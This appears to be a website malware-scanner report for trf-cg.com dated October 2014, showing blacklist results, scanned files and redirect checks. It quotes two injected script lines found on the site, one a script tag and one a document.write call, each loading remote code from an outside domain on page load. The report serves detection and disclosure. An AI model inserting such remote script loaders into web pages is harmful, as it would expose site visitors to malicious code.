Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=trf-cg.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://trf-cg.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://trf-cg.com/ | 200 OK Content-Length: 3482 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://proyectodevida.org.mx/common.php"></script> | ||
http://trf-cg.com/AC_RunActiveContent.js | 200 OK Content-Length: 8167 Content-Type: application/javascript | suspicious |
Suspicious code found /**/ document.write("<script type='text/javascript' src='http://www.arxen.com/YZMNJHX8.php'></"+ "script>"); | ||
http://trf-cg.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: trf-cg.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 03:59:44 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 3482
Content-Type: text/html
Last-Modified: Mon, 01 Sep 2014 15:42:04 GMT
...3482 bytes of data.
GET / HTTP/1.1
Host: trf-cg.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 03 Oct 2014 03:59:44 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 3482
Content-Type: text/html
Last-Modified: Mon, 01 Sep 2014 15:42:04 GMT
...3482 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: trf-cg.com
Referer: http://www.google.com/search?q=trf-cg.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: trf-cg.com
Referer: http://www.google.com/search?q=trf-cg.com
Result:
The result is similar to the first query. There are no suspicious redirects found.